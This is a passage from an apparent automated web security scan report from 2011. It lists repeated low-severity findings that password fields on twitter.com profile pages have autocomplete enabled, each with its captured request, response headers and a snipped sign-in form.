<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="175bd6aba2ae90500418892622bb8793d9050022" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.51. http://twitter.com/Michael_Joseph

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /Michael_Joseph

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions
The form contains the following password field with autocomplete enabled: session[password]

Request

GET /Michael_Joseph HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:25:39 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224739-65021-17900
ETag: "4ee6993dd58f48089b6cdab2133559a8"
Last-Modified: Fri, 28 Jan 2011 14:25:39 GMT
X-Runtime: 0.01172
Content-Type: text/html; charset=utf-8
Content-Length: 51377
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="c98afc724e7d87cfbb425aed5ad61fa8eff56952" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.52. http://twitter.com/MittRomney

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /MittRomney

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions
The form contains the following password field with autocomplete enabled: session[password]

Request

GET /MittRomney HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:41:22 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265282-38547-52668
ETag: "3107c6cc6c6978ff3b7722cbf52c2af6"
Last-Modified: Sat, 29 Jan 2011 01:41:22 GMT
X-Runtime: 0.00731
Content-Type: text/html; charset=utf-8
Content-Length: 46527
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%253D%253D--a144f2d48721ec13cc6db17b0167bf7e0dce4447; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="d09acd113b9e29baa5b960bb42c943b5af0bb959" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.53. http://twitter.com/NewYorkPost

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /NewYorkPost

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions
The form contains the following password field with autocomplete enabled: session[password]

Request

GET /NewYorkPost HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:13 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265993-27588-50087
ETag: "e773df2d3a6b90bf31143c56a9f20c5d"
Last-Modified: Sat, 29 Jan 2011 01:53:13 GMT
X-Runtime: 0.01729
Content-Type: text/html; charset=utf-8
Content-Length: 53629
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="e427f6c6461724f40c1b21b5fc4b5b2f1d673b99" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.54. http://twitter.com/Nicole_114

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /Nicole_114

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions
The form contains the following password field with autocomplete enabled: session[password]

Request

GET /Nicole_114 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:52:53 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296265973-31870-20101
ETag: "259b5389cc01f15bd18d06cca5332bd4"
Last-Modified: Sat, 29 Jan 2011 01:52:53 GMT
X-Runtime: 0.01243
Content-Type: text/html; charset=utf-8
Content-Length: 47429
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="175bd6aba2ae90500418892622bb8793d9050022" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.55. http://twitter.com/Oprah

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /Oprah

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions
The form contains the following password field with autocomplete enabled: session[password]

Request

GET /Oprah HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:50 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266030-46156-5686
ETag: "857c98a5094f6af87e0d30eae77b7c6f"
Last-Modified: Sat, 29 Jan 2011 01:53:50 GMT
X-Runtime: 0.01844
Content-Type: text/html; charset=utf-8
Content-Length: 42735
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="4ac8768ba7d86c7142fdabb6dcedf60a43f3d445" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.56. http://twitter.com/PageLines

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /PageLines

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions
The form contains the following password field with autocomplete enabled: session[password]

Request

GET /PageLines HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:04 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225004-17515-51236
ETag: "24c45e2f38e6ae478c4805af9b36ff8e"
Last-Modified: Fri, 28 Jan 2011 14:30:04 GMT
X-Runtime: 0.01227
Content-Type: text/html; charset=utf-8
Content-Length: 51190
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="b6b585fa774698d7e3999b90e0e70b9350fdf65c" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.57. http://twitter.com/PhantomGourmet

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /PhantomGourmet

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions
The form contains the following password field with autocomplete enabled: session[password]

Request

GET /PhantomGourmet HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:53:53 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266033-91577-32859
ETag: "161ed10fae22588b3ed41cf62918d8a5"
Last-Modified: Sat, 29 Jan 2011 01:53:53 GMT
X-Runtime: 0.00903
Content-Type: text/html; charset=utf-8
Content-Length: 47996
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="175bd6aba2ae90500418892622bb8793d9050022" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.58. http://twitter.com/Prucenter

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /Prucenter

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions
The form contains the following password field with autocomplete enabled: session[password]

Request

GET /Prucenter HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Sat, 29 Jan 2011 01:54:03 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296266043-49777-22631
ETag: "6809b20e173abb1f6aa98709f0f9d6dc"
Last-Modified: Sat, 29 Jan 2011 01:54:03 GMT
X-Runtime: 0.01106
Content-Type: text/html; charset=utf-8
Content-Length: 52276
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoMdHpfbmFtZSIUQ2VudHJhbCBBbWVyaWNhOgxjc3JmX2lkIiVhYmM0%250ANTVjOWI0NTViYzM3ZDBmZDI5ZjI2YTVlMzExYzoVaW5fbmV3X3VzZXJfZmxv%250AdzA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--a6d7378e10bd529dc003a5da544066e5f6c32f72; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="75695cb3f98c357944ae73c0ee6c5078efe13341" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

12.59. http://twitter.com/PureADK

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /PureADK

Issue detail

The page contains a form with the following action URL: https://twitter.com/sessions
The form contains the following password field with autocomplete enabled: session[password]

Request

GET /PureADK HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:28 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225028-9085-29245
ETag: "6ea59f215eff63985173a556c3c58572"
Last-Modified: Fri, 28 Jan 2011 14:30:28 GMT
X-Runtime: 0.01097
Content-Type: text/html; charset=utf-8
Content-Length: 57696
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCDNO8MwtAToHaWQiJTFjOTUzNDgxYTQyZmRl%250AOWMwYzc0YWVkNTc5MWYyZjY0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a8f223ad45d09367559f519bdad491ac222063d2; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
